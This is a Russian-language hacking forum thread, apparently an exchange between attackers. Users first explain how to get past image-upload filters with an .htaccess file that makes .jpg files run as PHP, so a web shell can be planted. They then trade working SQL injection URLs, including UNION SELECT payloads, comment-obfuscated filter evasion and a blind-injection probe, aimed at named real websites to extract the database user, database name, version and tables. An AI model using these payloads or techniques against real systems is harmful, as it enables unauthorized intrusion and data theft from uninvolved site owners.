где то я это уже видел )))) Попробуй .htaccess, подмену mime-types, .php.ggif, shell.jpg.php льешь хтацесс с таким содержимым: <Files "shell.jpg"> RemoveHandler .jpg AddType application/x-httpd-php .jpg </Files> и вслед shell.jpg
А я был-бы очень рад, если-бы тут не задавали глупых вопросов, а сначала думали. Наверное проверка на расширение для того и сделана, что-бы не возможно было залить то, что нельзя. Или её по Вашему для чего делают? Да, если это делал криворукий кодер, то ВОЗМОЖНО! варианты есть, но без кода можно гадать бесконечно долго. Вот материал, рекоммендую ознакомится http://habrahabr.ru/blogs/php/44610/
С помощью htaccess можно переопределить средства интерпритирования файлов с определенным расширением. Например: если в твоем случае есть доступ к файловой системе заливаешь туда htaccess (в директорию куда кладутся залитые картинки), который содержит код, предложенный Iceangel_ и льеш свой шелл с расширением jpg. Фильтрацию по расширению обойдешь и шелл будет работать.
30 % что зальёться .htaccess Т.к. если он уже php режет, это уже значит фильтрация. // PS Теория фильтрации fail. 30 % И 95 % что сам .htaccess проканает. Т.к. не всегда .htaccess Да и кто знает, мб там .htaccess лежит :O Кстате DSU, IceAngel_ прав, если даже .htaccess в главной сказал мол jpg текст, то он в своей уже удаляет это правило, и создаёт новое.
Сомневаюсь. Можно пример такого .htaccess`а ? З.Ы. Заранее прошу обратить внимание на директиву RemoveHandler в моем примере.
С htaccess-ом конечно интересно, но если php.jpg загрузился, то значит фильтрация по расширению. Скорей всего фильтрация расширений по типу "разрешено все, что не запрещено". Попробуй пихнуть что-то типа php.222 и если прокатит, то пробуй все возможные расширения, которые интерпретируются как php. Например: .php3 .php .phtml .php4 .php5 Можете че и забыли в фильтре написать.
Запретный ошибке Привет группы; Как мы можем получить таблицу с этого сайта, то посмотрим Запретный http://www.hoanganjsc.com.vn/product.php?prodid=-90%20union%20select%201,2,3,4,5,6,7,8,9,10,11,1,2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33%20-- Вьетнамский сайте
И откуда ты взял во втором selectе 33 столбца? Для параметра prodid правильный запрос будет Code: http://www.hoanganjsc.com.vn/product.php?prodid=-90+union+all+select+1,2,3,4--+
'33' я получил от "order by" http://www.hoanganjsc.com.vn/product.php?prodid=90%20order%20by%2034-- <-- Ошибка мы можем придать таблице этого сайта, потому что сайт не показал какой-либо номер для инъекций?
всё он верно сделал. Просто там несколько запросов http://www.hoanganjsc.com.vn/product.php?prodid=-90/**/union/**/select/**/1,2,UNHEX(HEX(concat_ws(0x3a,User(),Database(),Version()))),4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33--
Вроде бы на прошлой странице уже решили эту проблему или на этом сайте нужно было вывести данные именно в переменной тс?)) Jokester, зачем эти хексы, анхексы. Всё и так прекрасно выводится. Не в обиду http://www.hoanganjsc.com.vn/product.php?prodid=-90+union/**/select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33--
пока получилась только слепая инъекция: http://www.mibf.ru/index.php?id=23+and+substring(version(),1,1)=5--+
LokbatanLi Если девятое поле не числовое отрабатывает редирект, а потом в урле вывод http://www.mibf.ru/index.php?id=-23+union+select+1,2,3,4,5,6,7,version(),null,10/* v1d0qz Специально поставил хекс\анхекс ибо на въетнамском сайте у него дальше 99% начнутся проблемы с кодировкой, он опять придёт сюда с вопросом, и опять подарит мне "воу, большое!". А зачем мне два больших "воу", сам подумай? Я с одним-то не знаю что теперь делать
http://www.armeniafund.org/press_releases/press_releases.php?id=-234+union+select+0,1,2,3,4,5,6 version()-4.0.27 mysql.user-net access vot tolko nasel table_name-login nu ne moqu ne kak nayti column_name// esli mojno pomoqite pojalusta// i pomoymu bil sposob mojno nayti v 4 vetke column_name esli znaem table_name// nu ne znayuk kak eto bil i qde 4ital.. pomoqite..
а как насчет вывод таблиц (information_schema.tables фильтруется) там тоже фильтруется.... можно и так http://www.hoanganjsc.com.vn/product.php?prodid=-90+/*!union*/+select+1,2,version(),4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26,27,28,29,30,31,32,33--
